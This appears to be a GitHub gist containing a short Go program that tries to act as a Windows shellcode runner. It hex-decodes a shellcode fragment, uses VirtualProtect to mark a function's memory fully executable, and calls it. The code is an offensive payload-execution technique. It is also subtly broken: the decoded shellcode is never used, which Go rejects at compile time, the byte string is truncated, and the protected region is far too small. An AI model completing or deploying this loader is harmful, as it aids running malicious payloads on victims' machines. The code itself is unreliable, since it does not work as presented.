Last active
July 3, 2021 22:20
-
-
Save affix/7634e763fee96a52f2bfad82db08deea to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "encoding/hex" | |
| "fmt" | |
| "syscall" | |
| "unsafe" | |
| ) | |
| var procVirtualProtect = syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualProtect") | |
| func VirtualProtect(lpAddress unsafe.Pointer, dwSize uintptr, flNewProtect uint32, lpflOldProtect unsafe.Pointer) bool { | |
| ret, _, _ := procVirtualProtect.Call( | |
| uintptr(lpAddress), | |
| uintptr(dwSize), | |
| uintptr(flNewProtect), | |
| uintptr(lpflOldProtect)) | |
| return ret > 0 | |
| } | |
| func main() { | |
| sc, err := hex.DecodeString("fc4883e4f0e8c000000041") | |
| if err != nil { | |
| fmt.Println(err) | |
| } | |
| f := func() {} | |
| var oldfperms uint32 | |
| if !VirtualProtect( | |
| unsafe.Pointer(*(**uintptr)(unsafe.Pointer(&f))), // The pointer to our f() function (lpAddress) | |
| unsafe.Sizeof(uintptr(0)), // The size of the access protection attributes to be changed (dwSize) | |
| uint32(0x40), // Our new memory access permission 0x40 FULL ACCESS | |
| unsafe.Pointer(&oldfperms)) { // Store our old permissions in the oldfperms var | |
| panic("Call to VirtualProtect failed!") | |
| } | |
| f() | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment